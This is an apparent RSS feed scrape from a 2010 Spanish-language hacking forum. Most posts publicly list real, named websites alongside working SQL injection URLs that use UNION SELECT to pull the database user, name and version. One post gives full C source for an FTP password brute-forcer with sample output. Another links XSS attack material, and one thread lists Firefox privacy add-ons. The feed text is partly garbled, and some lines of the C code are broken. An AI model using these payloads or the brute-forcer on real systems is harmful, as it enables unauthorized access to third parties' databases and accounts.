https://foro.undersecurity.net/index.phpThu, 09 Sep 2010 09:08:53 -0400 Phorum 5.2.15a https://foro.undersecurity.net/read.php?47,7966,7966#msg-7966 [XSS] www.ensenada.net (no replies)https://foro.undersecurity.net/read.php?47,7966,7966#msg-7966 Th3.xin0x Full-D Website Wed, 08 Sep 2010 23:24:12 -0400 https://foro.undersecurity.net/read.php?47,7965,7965#msg-7965 [SQLI MYSQL] www.riskcenter.com (no replies)https://foro.undersecurity.net/read.php?47,7965,7965#msg-7965http://www.riskcenter.com/story.php?id=13432+and+1=0+union+select+1,2,3,4,group_concat%28table_name%29,6,7,8,9,10,11,12,13,14,15,16,17+from+information_schema.tables

IMG = ]]> Th3.xin0x Full-D Website Wed, 08 Sep 2010 22:29:52 -0400 https://foro.undersecurity.net/read.php?47,7964,7964#msg-7964 [SQLI MYSQL] www.informaticahispana.com (no replies)https://foro.undersecurity.net/read.php?47,7964,7964#msg-7964http://www.informaticahispana.com/ver.php?id=5+and+1=0+union+select+concat_ws%280x3A,user%28%29,database%28%29,version%28%29%29,2,3,4+--+


IMG =

]]> Th3.xin0x Full-D Website Tue, 07 Sep 2010 22:37:48 -0400 https://foro.undersecurity.net/read.php?47,7963,7963#msg-7963 [SQLI MYSQL] www.oktava-shop.com (no replies)https://foro.undersecurity.net/read.php?47,7963,7963#msg-7963http://www.oktava-shop.com/view_prod.php?id=110+and+1=0+union+select+1,concat_ws%280x3A,user%28%29,database%28%29,version%28%29%29,3,4,5,6,7,8,9,10,11,12,13,14+--+


IMG =

]]> Th3.xin0x Full-D Website Tue, 07 Sep 2010 22:34:34 -0400 https://foro.undersecurity.net/read.php?47,7962,7962#msg-7962 [SQLI MYSQL] www.creadorescolombianos.com (no replies)https://foro.undersecurity.net/read.php?47,7962,7962#msg-7962http://www.creadorescolombianos.com/contenido.php?id=52+and+1=0+union+select+1,2,concat_ws%280x3A,user%28%29,database%28%29,version%28%29%29,4,5,6,7,8,9

IMG = ]]> Th3.xin0x Full-D Website Tue, 07 Sep 2010 20:27:29 -0400 https://foro.undersecurity.net/read.php?19,7957,7957#msg-7957 FTP Bruter [C] (no replies)https://foro.undersecurity.net/read.php?19,7957,7957#msg-7957 Brute Force By X4cks

* Los datos que te mada el servidor los lee para el lado del ojete pero igual se entiende.
* Fue creado por mi
* Si no les gusta el nombre del programa , cagense
* Soy sincero =)
Language: C
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <sys/stat.h>
char cadena[100];
int asd;
int i=1;
struct cracker {
	char host[256];
	char peticiones[1024];
}cracker;
struct attack {
	char host[256];
	char peticion1[256];
	char peticion2[256];
	char peticion3[256];
}attack;
int main (int argc, char *argv[]){
struct hostent *ad;
struct sockaddr_in serv;
char buffer[8000];
int bytes_read, s1;
int i=0;
bzero(&(attack),3);
bzero(&(cracker),2);
 
if (argc < 4) {
	printf("%s <host>  <diccionario> <user>\n" , argv[0]);
	printf("AVISO: El diccionario debe estar creado.\n");
	exit(0);
	}
printf (
"\n ##   #### ###  ####   \n"
"#  #  ##   #  #  #       \n"
"####    ## #  #  ####  \n"
"#  #  ###  ###   #      \n"
"#####################"
"\nSi no te gusta el nombre ,cagate\n");
FILE *diccionario = fopen (argv[2] , "r");
if (diccionario)
printf (
"\n\n#####################\n"
"#Fichero : Existente#\n"
"#####################\n");
else {
	printf ("No existe el archivo ... madefaca!\n");
	return 1;
}
if (sizeof(argv[1]) >= 256){
exit(0);
}
 
memcpy(attack.host , argv[1] , sizeof(argv[1]));
ad=gethostbyname(argv[1]);
 
if (ad == NULL ) {
	printf ("[-]error gethostbyname\n");
	exit(-1);
	}
 
	s1 = socket(AF_INET, SOCK_STREAM , 0);
 
	if (s1 == -1){
	printf ("[-]error al abrir el socket\n");
	}
 
serv.sin_family=AF_INET;
serv.sin_port=htons(21);
serv.sin_addr= *((struct in_addr *) ad->h_addr);
bzero(&(serv.sin_zero),8);
 
	if (connect(s1, (struct sockaddr*)&serv,sizeof(struct sockaddr))==-1) {
	printf ("error : conecting \n");
	printf ("[+]Conectando ... \n\n");
	memcpy(cracker.host , "Host: " , 6);
	}
 
(cracker.host + 6 , attack.host , strlen(attack.host));
(cracker.host + strlen(cracker.host), "\r\n",2);
printf ("Leyendo el diccionario : %s\n\n" , argv[2]);
while (!feof(diccionario)) {
i=0;
sprintf(attack.peticion1 , "USER %s\r\n", argv[3]);
sprintf(attack.peticion2 , "PASS %s\r\n" , fgets(cadena , 100 , diccionario));
printf ("\n!Comando !: %s", attack.peticion1);
printf ("\n!Comando !: %s", attack.peticion2);
sleep (10);
send (s1, attack.peticion1 , strlen(attack.peticion1),0);
send (s1, attack.peticion2 , strlen(attack.peticion2),0);
 
bytes_read=recv(s1, buffer , sizeof(buffer) , 0);
printf ("Server Message: %s" , buffer);
bytes_read=recv(s1, buffer , sizeof(buffer) , 0);
printf ("Server Message: %s" , buffer);
bytes_read=recv(s1, buffer , sizeof(buffer) , 0);
printf ("Server Mensaje: %s" , buffer);
}
printf ("[*] Brute : Finish\n");
close(s1);
exit(0);
}
[/code]

Aqui un ejemplo de como funciona
Comando : PASS aaa

Server Message: 220 (vsFTPd 2.0.1)
Server Message: 331 Please specify the password.
Server Mensaje: 530 Login incorrect.
 password.

Comando : USER admin

Comando : PASS abc

Server Message: 530 Please login with USER and PASS.
Server Message: 331 Please specify the password.
S.
Server Mensaje: 530 Login incorrect.
 password.
S.

Comando : USER admin

Comando : PASS academia

Server Message: 530 Please login with USER and PASS.
Server Message: 331 Please specify the password.
S.
Server Mensaje: 530 Login incorrect.
 password.
S.
Si no les gusta se pueden ir ...
Bytez]]> xacks Programacion GeneralMon, 06 Sep 2010 09:12:18 -0400 https://foro.undersecurity.net/read.php?47,7956,7956#msg-7956 [SQLI MYSQL] www.stracingfiber.es (no replies)https://foro.undersecurity.net/read.php?47,7956,7956#msg-7956http://www.stracingfiber.es/producto.php?id=543+and+1=0+union+select+1,2,3,concat_ws%280x3A,user%28%29,database%28%29,version%28%29%29,5,6,7,8,9,10,11,12+--+]]> Th3.xin0x Full-D Website Sun, 05 Sep 2010 22:23:27 -0400 https://foro.undersecurity.net/read.php?47,7955,7955#msg-7955 [SQLI MYSQL] www.naetura.com (no replies)https://foro.undersecurity.net/read.php?47,7955,7955#msg-7955http://www.naetura.com/producto.php?id=16+and+1=0+union+select+1,concat_ws%280x3A,user%28%29,database%28%29,version%28%29%29,3,4,5,6,7,8,9,10,11,12


IMG =
]]> Th3.xin0x Full-D Website Sun, 05 Sep 2010 21:59:59 -0400 https://foro.undersecurity.net/read.php?47,7954,7954#msg-7954 [SQLI MYSQL] www.tissusargentina.com.ar (no replies)https://foro.undersecurity.net/read.php?47,7954,7954#msg-7954http://www.tissusargentina.com.ar/producto.php?id=21+and+1=0+union+select+1,concat_ws%280x3A,user%28%29,database%28%29,version%28%29%29


IMG =
]]> Th3.xin0x Full-D Website Sun, 05 Sep 2010 21:52:21 -0400 https://foro.undersecurity.net/read.php?47,7953,7953#msg-7953 [SQLI MYSQL] www.24hcm.com (no replies)https://foro.undersecurity.net/read.php?47,7953,7953#msg-7953


IMG = ]]> Th3.xin0x Full-D Website Sun, 05 Sep 2010 21:22:29 -0400 https://foro.undersecurity.net/read.php?47,7951,7951#msg-7951 [SQLI MYSQL] www.documentamadrid.com (no replies)https://foro.undersecurity.net/read.php?47,7951,7951#msg-7951 Th3.xin0x Full-D Website Sun, 05 Sep 2010 16:09:32 -0400 https://foro.undersecurity.net/read.php?47,7950,7950#msg-7950 [SQLI MYSQL] www.clancbs.com (no replies)https://foro.undersecurity.net/read.php?47,7950,7950#msg-7950

IMG = ]]> Th3.xin0x Full-D Website Sun, 05 Sep 2010 16:00:10 -0400 https://foro.undersecurity.net/read.php?47,7949,7949#msg-7949 [SQLI MYSQL] www.generacionpoliticasur.org (no replies)https://foro.undersecurity.net/read.php?47,7949,7949#msg-7949 Th3.xin0x Full-D Website Sun, 05 Sep 2010 15:47:03 -0400 https://foro.undersecurity.net/read.php?47,7948,7948#msg-7948 [SQLI MYSQL] www.edicioneslallave.com (no replies)https://foro.undersecurity.net/read.php?47,7948,7948#msg-7948

IMG = ]]> Th3.xin0x Full-D Website Sun, 05 Sep 2010 15:39:14 -0400 https://foro.undersecurity.net/read.php?47,7947,7947#msg-7947 [SQLI MYSQL] www.clubdelacepa.com (no replies)https://foro.undersecurity.net/read.php?47,7947,7947#msg-7947

IMG = ]]> Th3.xin0x Full-D Website Sun, 05 Sep 2010 15:05:44 -0400 https://foro.undersecurity.net/read.php?47,7946,7946#msg-7946 [SQLI MYSQL] www.ccp.si (no replies)https://foro.undersecurity.net/read.php?47,7946,7946#msg-7946

IMG = ]]> Th3.xin0x Full-D Website Sun, 05 Sep 2010 14:52:48 -0400 https://foro.undersecurity.net/read.php?47,7945,7945#msg-7945 [SQLI MYSQL] www.gabyvargas.com (no replies)https://foro.undersecurity.net/read.php?47,7945,7945#msg-7945

IMG = ]]> Th3.xin0x Full-D Website Sun, 05 Sep 2010 14:42:21 -0400 https://foro.undersecurity.net/read.php?76,7944,7944#msg-7944 Ataques XSS con javascript (no replies)https://foro.undersecurity.net/read.php?76,7944,7944#msg-7944

DOWNLOAD]]> Th3.xin0x Cross Site Scripting (XSS, CSRF)Sun, 05 Sep 2010 11:44:53 -0400 https://foro.undersecurity.net/read.php?32,7943,7943#msg-7943 Que addons de seguridad y privacidad usan en firefox? (1 reply)https://foro.undersecurity.net/read.php?32,7943,7943#msg-7943
HTTP Request String Editor
https://addons.mozilla.org/en-US/firefox/addon/211337/
(todavia no lo probé, pero se ve interesante)

calomel ssl validation
https://addons.mozilla.org/en-US/firefox/addon/207653/
(lo mismo)


Form History Control
https://addons.mozilla.org/en-US/firefox/addon/12021/
(lo mismo)

NoScript
https://addons.mozilla.org/en-US/firefox/addon/722/
(esto deberia venir por default)

adblock plus
https://addons.mozilla.org/en-US/firefox/addon/1865/?src=collection&collection_id=d9031e34-6e4f-0956-3806-5134a373d9df

BetterPrivacy
https://addons.mozilla.org/en-US/firefox/addon/6623

flashblock
https://addons.mozilla.org/en-US/firefox/addon/433
(no lo probé porque noscript hace lo mismo y mas)

RefControl
https://addons.mozilla.org/en-US/firefox/addon/953/

force-tls
https://addons.mozilla.org/en-US/firefox/addon/12714/
(no lo probé)

cuando pueda (en unas dos semanas) voy a probar los que no probé y voy a agregar algunos mas]]> seth Dudas GeneralesTue, 07 Sep 2010 18:23:50 -0400 https://foro.undersecurity.net/read.php?47,7942,7942#msg-7942 [SQLI MYSQL] www.sinmaletas.com (no replies)https://foro.undersecurity.net/read.php?47,7942,7942#msg-7942

IMG = ]]> Th3.xin0x Full-D Website Sat, 04 Sep 2010 19:18:55 -0400 https://foro.undersecurity.net/read.php?47,7941,7941#msg-7941 [SQLI MYSQL] www.gamesinaflash.com (no replies)https://foro.undersecurity.net/read.php?47,7941,7941#msg-7941

IMG = ]]> Th3.xin0x Full-D Website Sat, 04 Sep 2010 19:14:10 -0400 https://foro.undersecurity.net/read.php?47,7939,7939#msg-7939 [SQLI MYSQL] www.brainmelt.com (no replies)https://foro.undersecurity.net/read.php?47,7939,7939#msg-7939

IMG = ]]> Th3.xin0x Full-D Website Sat, 04 Sep 2010 18:16:45 -0400 https://foro.undersecurity.net/read.php?47,7938,7938#msg-7938 [SQLI MYSQL] www.codeglue.com (no replies)https://foro.undersecurity.net/read.php?47,7938,7938#msg-7938


IMAGN = ]]> Th3.xin0x Full-D Website Sat, 04 Sep 2010 18:12:54 -0400 https://foro.undersecurity.net/read.php?47,7937,7937#msg-7937 [SQLI MYSQL] www.splashworks.com (no replies)https://foro.undersecurity.net/read.php?47,7937,7937#msg-7937 Th3.xin0x Full-D Website Sat, 04 Sep 2010 18:06:58 -0400 https://foro.undersecurity.net/read.php?47,7936,7936#msg-7936 [SQLI MYSQL] www.yoquierogames.com (no replies)https://foro.undersecurity.net/read.php?47,7936,7936#msg-7936


IMAGN = ]]> Th3.xin0x Full-D Website Sat, 04 Sep 2010 18:02:46 -0400 https://foro.undersecurity.net/read.php?47,7935,7935#msg-7935 [SQLI MYSQL] www.artistsincanada.com (no replies)https://foro.undersecurity.net/read.php?47,7935,7935#msg-7935
]]> Th3.xin0x Full-D Website Sat, 04 Sep 2010 14:52:36 -0400 https://foro.undersecurity.net/read.php?47,7934,7934#msg-7934 [SQLI MYSQL] www.museum.ge (no replies)https://foro.undersecurity.net/read.php?47,7934,7934#msg-7934


]]> Th3.xin0x Full-D Website Sat, 04 Sep 2010 14:46:13 -0400 https://foro.undersecurity.net/read.php?47,7933,7933#msg-7933 [SQLI MYSQL] www.citricagency.com (no replies)https://foro.undersecurity.net/read.php?47,7933,7933#msg-7933 Th3.xin0x Full-D Website Sat, 04 Sep 2010 14:37:46 -0400 https://foro.undersecurity.net/read.php?47,7932,7932#msg-7932 [SQLI MYSQL] www.avatarity.com (no replies)https://foro.undersecurity.net/read.php?47,7932,7932#msg-7932



Nuevo metodo de post con imagen :)]]> Th3.xin0x Full-D Website Sat, 04 Sep 2010 14:08:18 -0400 https://foro.undersecurity.net/read.php?47,7929,7929#msg-7929 [SQLI MYSQL] www.welcomesalta.com.ar (no replies)https://foro.undersecurity.net/read.php?47,7929,7929#msg-7929 Th3.xin0x Full-D Website Thu, 02 Sep 2010 21:52:18 -0400